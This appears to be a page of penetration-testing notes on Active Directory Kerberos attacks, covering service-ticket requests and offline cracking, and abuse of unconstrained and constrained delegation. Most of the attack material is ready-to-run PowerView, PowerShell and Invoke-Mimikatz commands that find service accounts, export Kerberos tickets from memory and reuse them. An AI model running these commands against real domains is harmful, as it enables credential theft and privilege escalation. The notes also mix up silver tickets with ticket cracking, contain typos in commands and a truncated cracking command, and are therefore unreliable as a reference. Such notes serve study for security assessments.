Skip to content


Silver Tickets

  • Password hashes of service accounts could be used to create
  • Kerberos session ticket (TGS) has a sever portion which is encrypted with the password hash of the service account.
  • Can request a ticket and do offline brute forcing.

Kerberos Silver Ticket

  • KDC does not handle authorization
  • Can request TGS for any service
  • TGS is encrypted using target-service NTLM hash
  • .:. it is possible to brute-force the TGS to get target-service account credentials

Find Service Accounts


PowerView (SPN = Service Principal Name)

Get-Netuser -SPN

ActiveDirectory Module

Install-ActiveDirectoryModule -DllPath C:\AdModule\Microsoft.ActiveDirectory.Management.dll ADModulePath C:\AdModule\ActiveDirectory.psd1

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Request SPN Ticket

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<server-name>"



Save Tieket

List all tickets in cache (check if granted)



Invoke-Mimikatz -Command '"kerberos::list /export"'


python.exe .\ .\password.txt '<ticket>'

or use John

Kerberos Delegation

  • Allows reusing the end-user credentials to access resources hosted on a different server.
  • Used when Kerberos Double Hop is required.
  • Impersonating the incoming/authentication user is necessary to work.
  • Types:
    • Unconstrained (only Windows Server 2003 <) - Allow authentication to any service in the domain
    • Constrained

Unconstrained Kerberos Delegation

Kerberos Delegation

  1. User provide credentials to DC
  2. DC returns TGT
  3. User request TGS for web service
  4. DC provides TGS (TGS contains user's TGT)
  5. User sends TGT and TGS to web Server
  6. Web server service account use user's TGT to request a TGS got database server from DC * Web server service account can decrypt TGS and extract the user's TGT * This is because TGS is encryoted with web server service account's NTLM hash
  7. Web server service account connects to database impersonating the user

Identifying Nodes with Unconstrained Delegation Enabled

Get-NetComputer -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Attack Pattern

  • Compromise the server that use unconstrained delegation
  • Wait for a high privileged connect
  • Once connected, export all the tickets including TGT for that User
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse tickets with

Invoke-Mimikatz -Command '"kerberos::ppt C:\tickets\admin.kirbi"'

Constrained Kerberos Delegation

  • Only provide access to specified services on a specifiv computer
  • Service account must have TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - T2A4D UserAccountControl attribute
  • Service account can asccess all services specified in msDS-AllowedToDelegateTo attribute

Identifying Users with Unconstrained Delegation Enabled

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Install-ActiveDirectoryModule -DllPath C:\AdModule\Microsoft.ActiveDirectory.Management.dll ADModulePath C:\AdModule\ActiveDirectory.psd1

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Attack Patterns

  • Protocol Transition used in SSO
  • Delegation occurs not only for the specific service but for any service running under the same account. No validation for the SPN specified.